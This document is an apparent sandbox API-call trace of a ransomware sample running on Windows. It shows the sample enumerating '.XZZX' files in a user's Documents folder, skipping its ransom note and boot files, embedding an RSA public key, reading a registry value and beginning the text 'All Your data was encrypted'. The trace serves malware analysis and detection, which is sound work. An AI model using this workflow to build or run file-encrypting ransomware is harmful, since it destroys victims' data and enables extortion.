[0173.946] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa54 [0173.946] Sleep (dwMilliseconds=0x96) [0174.101] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0174.101] lstrcmpW (lpString1="B8F78CE2222013C8FF50021B265CF810.XZZX", lpString2="..") returned 1 [0174.101] lstrcmpW (lpString1="B8F78CE2222013C8FF50021B265CF810.XZZX", lpString2=".") returned 1 [0174.101] StrStrW (lpFirst="B8F78CE2222013C8FF50021B265CF810.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0174.101] StrStrW (lpFirst="B8F78CE2222013C8FF50021B265CF810.XZZX", lpSrch="ntldr") returned 0x0 [0174.101] StrStrW (lpFirst="B8F78CE2222013C8FF50021B265CF810.XZZX", lpSrch="NTLDR") returned 0x0 [0174.101] StrStrW (lpFirst="B8F78CE2222013C8FF50021B265CF810.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0174.101] StrStrW (lpFirst="B8F78CE2222013C8FF50021B265CF810.XZZX", lpSrch="ntdetect.com") returned 0x0 [0174.101] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0174.102] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") [0174.102] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0174.102] lstrcpyW (in: lpString1=0x17cf1c, lpString2="B8F78CE2222013C8FF50021B265CF810.XZZX" | out: lpString1="B8F78CE2222013C8FF50021B265CF810.XZZX") returned="B8F78CE2222013C8FF50021B265CF810.XZZX" [0174.102] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0174.102] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa58 [0174.102] Sleep (dwMilliseconds=0x96) [0174.258] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0174.258] lstrcmpW (lpString1="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpString2="..") returned 1 [0174.258] lstrcmpW (lpString1="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpString2=".") returned 1 [0174.258] StrStrW (lpFirst="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0174.258] StrStrW (lpFirst="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpSrch="ntldr") returned 0x0 [0174.258] StrStrW (lpFirst="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpSrch="NTLDR") returned 0x0 [0174.258] StrStrW (lpFirst="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0174.258] StrStrW (lpFirst="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpSrch="ntdetect.com") returned 0x0 [0174.258] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0174.258] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") [0174.258] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0174.258] lstrcpyW (in: lpString1=0x17cf1c, lpString2="BB3CCCBC286641FC324D4A8B2C932644.XZZX" | out: lpString1="BB3CCCBC286641FC324D4A8B2C932644.XZZX") returned="BB3CCCBC286641FC324D4A8B2C932644.XZZX" [0174.258] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0174.258] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa5c [0174.259] Sleep (dwMilliseconds=0x96) [0174.413] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0174.413] lstrcmpW (lpString1="BE3510781871306D58A0B1081C6A14B5.XZZX", lpString2="..") returned 1 [0174.413] lstrcmpW (lpString1="BE3510781871306D58A0B1081C6A14B5.XZZX", lpString2=".") returned 1 [0174.413] StrStrW (lpFirst="BE3510781871306D58A0B1081C6A14B5.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0174.413] StrStrW (lpFirst="BE3510781871306D58A0B1081C6A14B5.XZZX", lpSrch="ntldr") returned 0x0 [0174.413] StrStrW (lpFirst="BE3510781871306D58A0B1081C6A14B5.XZZX", lpSrch="NTLDR") returned 0x0 [0174.413] StrStrW (lpFirst="BE3510781871306D58A0B1081C6A14B5.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0174.413] StrStrW (lpFirst="BE3510781871306D58A0B1081C6A14B5.XZZX", lpSrch="ntdetect.com") returned 0x0 [0174.413] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0174.413] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") [0174.414] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0174.414] lstrcpyW (in: lpString1=0x17cf1c, lpString2="BE3510781871306D58A0B1081C6A14B5.XZZX" | out: lpString1="BE3510781871306D58A0B1081C6A14B5.XZZX") returned="BE3510781871306D58A0B1081C6A14B5.XZZX" [0174.414] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0174.414] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa60 [0174.414] Sleep (dwMilliseconds=0x96) [0174.569] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0174.569] lstrcmpW (lpString1="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpString2="..") returned 1 [0174.569] lstrcmpW (lpString1="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpString2=".") returned 1 [0174.569] StrStrW (lpFirst="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0174.569] StrStrW (lpFirst="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpSrch="ntldr") returned 0x0 [0174.569] StrStrW (lpFirst="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpSrch="NTLDR") returned 0x0 [0174.569] StrStrW (lpFirst="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0174.569] StrStrW (lpFirst="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpSrch="ntdetect.com") returned 0x0 [0174.569] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0174.569] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") [0174.570] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0174.570] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D4132CC416066089C413F0DC1A1E44D1.XZZX" | out: lpString1="D4132CC416066089C413F0DC1A1E44D1.XZZX") returned="D4132CC416066089C413F0DC1A1E44D1.XZZX" [0174.570] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0174.570] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa64 [0174.570] Sleep (dwMilliseconds=0x96) [0174.725] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0174.725] lstrcmpW (lpString1="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpString2="..") returned 1 [0174.726] lstrcmpW (lpString1="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpString2=".") returned 1 [0174.726] StrStrW (lpFirst="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0174.726] StrStrW (lpFirst="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpSrch="ntldr") returned 0x0 [0174.726] StrStrW (lpFirst="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpSrch="NTLDR") returned 0x0 [0174.726] StrStrW (lpFirst="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0174.726] StrStrW (lpFirst="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpSrch="ntdetect.com") returned 0x0 [0174.726] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0174.726] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") [0174.727] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0174.727] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D7DDFDC32CF119C87B5BFA373108FE10.XZZX" | out: lpString1="D7DDFDC32CF119C87B5BFA373108FE10.XZZX") returned="D7DDFDC32CF119C87B5BFA373108FE10.XZZX" [0174.727] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0174.727] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa68 [0174.727] Sleep (dwMilliseconds=0x96) [0174.881] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0174.881] lstrcmpW (lpString1="D8B4FBC032E124E029E6603236DA0928.XZZX", lpString2="..") returned 1 [0174.881] lstrcmpW (lpString1="D8B4FBC032E124E029E6603236DA0928.XZZX", lpString2=".") returned 1 [0174.882] StrStrW (lpFirst="D8B4FBC032E124E029E6603236DA0928.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0174.882] StrStrW (lpFirst="D8B4FBC032E124E029E6603236DA0928.XZZX", lpSrch="ntldr") returned 0x0 [0174.882] StrStrW (lpFirst="D8B4FBC032E124E029E6603236DA0928.XZZX", lpSrch="NTLDR") returned 0x0 [0174.882] StrStrW (lpFirst="D8B4FBC032E124E029E6603236DA0928.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0174.882] StrStrW (lpFirst="D8B4FBC032E124E029E6603236DA0928.XZZX", lpSrch="ntdetect.com") returned 0x0 [0174.882] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0174.882] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") [0174.882] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0174.882] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D8B4FBC032E124E029E6603236DA0928.XZZX" | out: lpString1="D8B4FBC032E124E029E6603236DA0928.XZZX") returned="D8B4FBC032E124E029E6603236DA0928.XZZX" [0174.882] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0174.882] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa6c [0174.882] Sleep (dwMilliseconds=0x96) [0175.037] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.037] lstrcmpW (lpString1="E1CB2DE23002B20E4903A282342F9656.XZZX", lpString2="..") returned 1 [0175.037] lstrcmpW (lpString1="E1CB2DE23002B20E4903A282342F9656.XZZX", lpString2=".") returned 1 [0175.037] StrStrW (lpFirst="E1CB2DE23002B20E4903A282342F9656.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0175.037] StrStrW (lpFirst="E1CB2DE23002B20E4903A282342F9656.XZZX", lpSrch="ntldr") returned 0x0 [0175.037] StrStrW (lpFirst="E1CB2DE23002B20E4903A282342F9656.XZZX", lpSrch="NTLDR") returned 0x0 [0175.037] StrStrW (lpFirst="E1CB2DE23002B20E4903A282342F9656.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0175.037] StrStrW (lpFirst="E1CB2DE23002B20E4903A282342F9656.XZZX", lpSrch="ntdetect.com") returned 0x0 [0175.037] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0175.037] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") [0175.038] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0175.038] lstrcpyW (in: lpString1=0x17cf1c, lpString2="E1CB2DE23002B20E4903A282342F9656.XZZX" | out: lpString1="E1CB2DE23002B20E4903A282342F9656.XZZX") returned="E1CB2DE23002B20E4903A282342F9656.XZZX" [0175.038] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0175.038] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa70 [0175.038] WaitForSingleObject (hHandle=0xa70, dwMilliseconds=0xffffffff) returned 0x0 [0175.039] Sleep (dwMilliseconds=0x96) [0175.193] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.193] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.193] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.193] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.193] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.193] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.193] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0175.193] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0175.193] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0175.194] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0175.194] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0175.194] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0175.194] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0175.194] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0175.194] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0175.194] SetErrorMode (uMode=0x1) returned 0x1 [0175.194] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_HELP_INSTRUCTION.TXT") returned 61 [0175.194] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0175.194] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0175.194] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xa74) returned 0x0 [0175.194] RegQueryValueExW (in: hKey=0xa74, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x46acc0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x46acc0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0175.194] RegCloseKey (hKey=0xa74) returned 0x0 [0175.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific 